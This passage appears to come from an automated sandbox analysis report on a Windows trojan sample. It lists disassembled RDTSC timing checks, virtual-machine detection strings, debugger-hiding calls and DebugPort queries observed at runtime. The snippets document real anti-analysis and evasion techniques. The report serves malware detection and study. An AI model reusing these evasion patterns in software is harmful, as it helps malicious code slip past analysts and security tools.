            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A8640 second address: 00000000007A8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9ACC second address: 00000000007A9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A900A second address: 00000000007A9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9059 second address: 00000000007A9059 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9138 second address: 00000000007A9138 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A5970 second address: 00000000007A5970 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A7FD6 second address: 00000000007A7FD6 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A47AA second address: 00000000007A7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C8016E6h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C8016E2h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C804ADEh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A5549 second address: 00000000007A5549 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A4EE7 second address: 00000000007A4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C8016E2h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B4EE7 second address: 00000000020B4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C8016E2h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A53C5 second address: 00000000007A53C5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A57E9 second address: 00000000007A57E9 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C8016E2h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C801BD8h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C8016E2h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C8016E2h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C801710h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C8019DCh 0x00000042 jmp 00007F430C8016E6h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C37BADAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc
            Source: C:\Windows\SysWOW64\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0816 rdtsc
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Roaming\win.exeWindow / User API: threadDelayed 580
            Source: C:\Users\user\AppData\Roaming\win.exe TID: 6324Thread sleep count: 580 > 30
            Source: C:\Users\user\AppData\Roaming\win.exe TID: 6324Thread sleep time: -5800000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\win.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\win.exeLast function: Thread delayed
            Source: win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462534085.000000000084E000.00000004.00000020.sdmp, win.exe, 00000016.00000002.670720058.00000000008D7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0816 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5B95 LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00567C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00567C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00562F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
